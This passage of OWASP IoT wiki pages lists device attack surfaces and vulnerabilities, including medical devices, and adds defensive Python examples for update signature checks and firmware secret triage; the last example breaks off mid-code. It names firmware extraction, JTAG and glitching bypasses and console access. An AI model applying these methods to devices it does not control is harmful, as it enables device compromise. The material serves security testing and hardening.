* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
|-<br />
|}<br />
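The Update Mechanism row above lists unsigned updates, unencrypted delivery, a writable update location and update verification as separate items, and the Device Firmware row adds firmware downgrade; in practice they fail together, because an attacker who can write to the update location only needs the device to skip one check. The Python below is an added example, not part of the OWASP project or of any vendor's code: it contrasts a hash-only check with a fail-closed verifier that checks vendor signature, image digest and anti-rollback in that order. The manifest format is invented for the demo and the RSA key pair is a toy built from Mersenne primes so the code runs on the standard library alone; a real device would verify Ed25519 or RSA-PSS with a vetted library against a key anchored in ROM or a secure element, and the download should still travel over TLS so the update contents are not exposed in transit.<br />

```python
"""Device-side firmware update verification (added example, not OWASP project code).

Shows why an integrity-only check (hash carried in an unsigned manifest) does not
stop a malicious update when the update location is writable, and what a minimal
fail-closed verifier looks like: vendor signature over the manifest, image digest
bound by that manifest, and anti-rollback on the version number.

Assumptions: the manifest format is invented for this demo, and the RSA key is a
toy built from Mersenne primes so the code runs offline on the standard library.
A real device verifies an Ed25519 or RSA-PSS signature with a vetted library,
against a public key anchored in ROM or a secure element.
"""
import hashlib
import json

# Toy vendor key (assumption: stands in for the real signing key). Textbook RSA
# over a SHA-256 digest illustrates the control flow; it is not for production.
_P = (1 << 127) - 1
_Q = (1 << 521) - 1
_N = _P * _Q
_E = 65537
_D = pow(_E, -1, (_P - 1) * (_Q - 1))   # modular inverse, Python 3.8+
VENDOR_PUBLIC_KEY = (_N, _E)            # what the device has burned in at manufacture


def _manifest_digest(manifest: dict) -> int:
    """Canonical JSON so signer and verifier hash identical bytes."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return int.from_bytes(hashlib.sha256(canonical).digest(), "big")


def build_update(image: bytes, version: int) -> dict:
    """Vendor side: the manifest binds version and image digest; the signature covers
    the manifest, so changing either the image or the version breaks it."""
    manifest = {"version": version, "sha256": hashlib.sha256(image).hexdigest()}
    signature = pow(_manifest_digest(manifest), _D, _N)
    return {"manifest": manifest, "signature": signature, "image": image}


def verify_hash_only(update: dict) -> bool:
    """The weak check ('Updates not signed'): integrity without authentication.
    Anyone who can rewrite the manifest can make any image pass."""
    return hashlib.sha256(update["image"]).hexdigest() == update["manifest"]["sha256"]


def verify_update(update: dict, installed_version: int, public_key=VENDOR_PUBLIC_KEY) -> bool:
    """Device side: accept only if every check passes; reject otherwise."""
    n, e = public_key
    manifest = update["manifest"]
    # 1. Authentication: was this manifest produced with the vendor's private key?
    #    Checked first, so nothing in the manifest is trusted before this point.
    if pow(update["signature"], e, n) != _manifest_digest(manifest):
        return False
    # 2. Integrity: does the image match the digest the vendor signed?
    if hashlib.sha256(update["image"]).hexdigest() != manifest["sha256"]:
        return False
    # 3. Anti-rollback: a genuine but older image must not be re-installed
    #    ('Firmware downgrade possibility').
    if manifest["version"] <= installed_version:
        return False
    return True


def attacker_repack(update: dict, evil_image: bytes) -> dict:
    """An attacker with write access to the update location swaps the image and
    recomputes the manifest hash. Without the private key the signature cannot
    be recomputed, which is exactly what verify_update catches."""
    manifest = dict(update["manifest"], sha256=hashlib.sha256(evil_image).hexdigest())
    return {"manifest": manifest, "signature": update["signature"], "image": evil_image}


if __name__ == "__main__":
    genuine = build_update(b"constructed firmware image v2", version=2)
    tampered = attacker_repack(genuine, b"constructed backdoored image")
    print("hash-only check accepts tampered image:", verify_hash_only(tampered))
    print("signed verifier accepts tampered image:", verify_update(tampered, installed_version=1))
    print("signed verifier accepts genuine v2 on a v1 device:", verify_update(genuine, installed_version=1))
    print("signed verifier accepts genuine v2 on a v3 device:", verify_update(genuine, installed_version=3))
```

Running it shows the hash-only check accepting the repacked image while the signed verifier rejects it, and the signed verifier also rejecting a genuine image whose version is not newer than the one installed. The order matters: the signature is checked before the version or digest fields are read, so a forged manifest cannot steer the verifier.<br />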
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a great deal of useful information: source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Fault injection (glitching) and side-channel attacks]<br />
|<br />
* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Fault injection (voltage or clock glitching) can also alter the execution flow, and side-channel attacks such as power analysis can leak keys and other secrets from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain full console access to the device<br />
* Typical protections are custom bootloaders that prevent entering single-user mode or a root shell, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
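The "Firmware and storage extraction" and "Insecure 3rd party components" rows above describe what a dumped image gives up: baked-in password hashes, private keys, credentials in URLs, and version banners of old BusyBox, OpenSSL or SSH builds. The Python below is an added example, not OWASP project code, showing a first-pass triage of such an image over raw bytes, so it works on a squashfs dump as well as on a single extracted binary. The firmware blob is constructed for the demo, the minimum-version policy is a caller-supplied table with illustrative numbers (not a vulnerability database), and the patterns cover common Linux-based devices rather than every firmware format.<br />

```python
"""Triage of an extracted firmware image (added example, not OWASP project code).

Once the image has been dumped (JTAG/SWD, flashrom, eMMC tap, an intercepted OTA
download), the first questions are the ones in the table above: which accounts have
baked-in password hashes, which private keys and credentials ship in every unit,
and which third-party components are older than policy allows.

Assumptions: SAMPLE_FIRMWARE is a constructed blob; the minimum-version policy is a
caller-supplied table (illustrative numbers, not a vulnerability database); the
patterns cover common Linux-based devices, not every firmware format.
"""
import re
from dataclasses import dataclass

# Constructed stand-in for a dumped root filesystem: an ELF header, two version
# banners, two /etc/shadow entries, an RSA private key and a URL with credentials.
SAMPLE_FIRMWARE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"BusyBox v1.20.2 (2013-06-12 09:14:33 UTC) multi-call binary.\x00"
    + b"OpenSSL 1.0.1e 11 Feb 2013\x00"
    + b"root:$1$abcdefgh$0123456789abcdefghijkl:16000:0:99999:7:::\n"
    + b"admin:$6$saltsalt$" + b"A" * 86 + b":16000:0:99999:7:::\n"
    + b"-----BEGIN RSA PRIVATE KEY-----\nMIIEow...\n-----END RSA PRIVATE KEY-----\n\x00"
    + b"http://svc:Sup3rS3cret@api.example.internal/report\x00"
    + b"dropbear v2012.55\x00"
)

SECRET_PATTERNS = {
    # user:$id$salt$hash:  as found in /etc/shadow (or a legacy /etc/passwd)
    "shadow-hash": re.compile(rb"([a-zA-Z_][a-zA-Z0-9_-]{0,31}):(\$[156]\$[^:\n\x00]{1,120}):"),
    "private-key": re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    # scheme://user:password@host
    "url-credential": re.compile(rb"[a-z][a-z0-9+.-]*://([^\s:/@\x00]+):([^\s/@\x00]+)@([^\s/\x00]+)"),
}
CRYPT_IDS = {b"1": "md5crypt", b"5": "sha256crypt", b"6": "sha512crypt"}

COMPONENT_BANNERS = {
    "BusyBox": re.compile(rb"BusyBox v(\d+\.\d+(?:\.\d+)?)"),
    "OpenSSL": re.compile(rb"OpenSSL (\d+\.\d+\.\d+[a-z]?)\b"),
    "dropbear": re.compile(rb"dropbear v(\d{4}\.\d+)"),
}


@dataclass
class Finding:
    category: str
    detail: str
    offset: int   # byte offset in the image, for follow-up in a hex editor


def parse_version(text: str) -> tuple:
    """'1.0.1e' -> (1, 0, 1, 5): a trailing letter becomes an extra patch level, so
    plain tuple comparison orders 1.0.1e < 1.0.1f < 1.0.2 correctly."""
    parts = []
    for piece in text.split("."):
        m = re.fullmatch(r"(\d+)([a-z]?)", piece)
        parts.append(int(m.group(1)))
        if m.group(2):
            parts.append(ord(m.group(2)) - ord("a") + 1)
    return tuple(parts)


def scan_secrets(image: bytes) -> list:
    """Hard-coded credentials and key material (attack surface: Device Firmware).
    The report names the account, algorithm and host, never the secret itself."""
    findings = []
    for name, pattern in SECRET_PATTERNS.items():
        for m in pattern.finditer(image):
            if name == "shadow-hash":
                algo = CRYPT_IDS.get(m.group(2)[1:2], "unknown")
                detail = f"account {m.group(1).decode()} ships a hard-coded {algo} password hash"
            elif name == "url-credential":
                detail = f"credentials for {m.group(1).decode()} embedded in URL to {m.group(3).decode()}"
            else:
                detail = m.group(0).decode()   # PEM header line only
            findings.append(Finding(name, detail, m.start()))
    return findings


def scan_components(image: bytes, minimum_versions: dict) -> list:
    """Third-party component banners older than the supplied policy floor."""
    findings = []
    for component, pattern in COMPONENT_BANNERS.items():
        for m in pattern.finditer(image):
            found = m.group(1).decode()
            floor = minimum_versions.get(component)
            if floor and parse_version(found) < parse_version(floor):
                findings.append(Finding("outdated-component",
                                        f"{component} {found} is below policy floor {floor}", m.start()))
    return findings


def triage(image: bytes, minimum_versions: dict) -> dict:
    """Findings grouped by category, so a report can be diffed build to build."""
    report = {}
    for finding in scan_secrets(image) + scan_components(image, minimum_versions):
        report.setdefault(finding.category, []).append(finding)
    return report


if __name__ == "__main__":
    # Illustrative policy floors (assumption); derive real ones from your SBOM process.
    policy = {"BusyBox": "1.31.0", "OpenSSL": "1.0.2", "dropbear": "2019.78"}
    for category, items in triage(SAMPLE_FIRMWARE, policy).items():
        for item in items:
            print(f"[{category}] @0x{item.offset:06x}: {item.detail}")
```

Any shadow-style hash found in a shipped image is a hard-coded credential regardless of algorithm, since every unit carries the same one; the algorithm is reported only because md5crypt hashes are cheap to crack offline. Version banners are a starting point, not proof of exposure: confirm which build is actually running and whether the vendor backported fixes before reporting a component as vulnerable.<br />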
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
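An added example (not OWASP or Firmwalker code) that runs a few of the file system checks behind the Device Firmware Vulnerabilities and Manufacturer Recommendations lists above: baked-in or empty password hashes in /etc/shadow, private keys shipped in the image, and the same certificate appearing in more than one firmware build. The image layout and the two sample builds are constructed in a temporary directory.

```python
"""File system checks behind several items in the firmware lists above.
Added example, not OWASP or Firmwalker code; the image layout and
contents are constructed for the demonstration."""
import hashlib
import re
import tempfile
from pathlib import Path

PEM_CERT = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
PEM_KEY = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
HARDCODED = "Hardcoded or easy to guess credentials"   # wording from the table above


def iter_text_files(rootfs, max_bytes=1 << 20):
    """Yield (relative path, text) for each small regular file in an extracted rootfs."""
    for p in rootfs.rglob("*"):
        if p.is_file() and p.stat().st_size <= max_bytes:
            yield p.relative_to(rootfs).as_posix(), p.read_text(errors="ignore")


def shadow_findings(rootfs):
    """Flag /etc/shadow entries whose password field is empty or a real hash;
    '!' or '*' means the account is locked, which is what a shipped image should have."""
    findings = []
    shadow = rootfs / "etc" / "shadow"
    if not shadow.is_file():
        return findings
    for line in shadow.read_text().splitlines():
        if not line.strip():
            continue
        name, _, rest = line.partition(":")
        hashval = rest.split(":")[0]
        if hashval == "":
            findings.append((HARDCODED, f"{name}: empty password"))
        elif not hashval.startswith(("!", "*")):
            findings.append((HARDCODED, f"{name}: baked-in password hash"))
    return findings


def cert_fingerprints(rootfs):
    """Map a SHA-256 fingerprint of every PEM certificate body to the file holding it."""
    fps = {}
    for rel, text in iter_text_files(rootfs):
        for m in PEM_CERT.finditer(text):
            body = "".join(m.group(1).split())          # ignore line wrapping
            fps[hashlib.sha256(body.encode()).hexdigest()] = rel
    return fps


def audit_image(rootfs):
    """Per-image findings as sorted (issue, detail) pairs."""
    findings = shadow_findings(rootfs)
    for rel, text in iter_text_files(rootfs):
        if PEM_KEY.search(text):
            findings.append(("Encryption key exposure", rel))
    return sorted(findings)


def cross_image_duplicates(images):
    """Certificates that appear in more than one image: {fingerprint: [image names]}."""
    seen = {}
    for name, rootfs in images.items():
        for fp in cert_fingerprints(rootfs):
            seen.setdefault(fp, []).append(name)
    return {fp: names for fp, names in seen.items() if len(names) > 1}


def build_sample_image(root, hardened):
    """Write a constructed mini rootfs. Every build ships the same device.crt; only the
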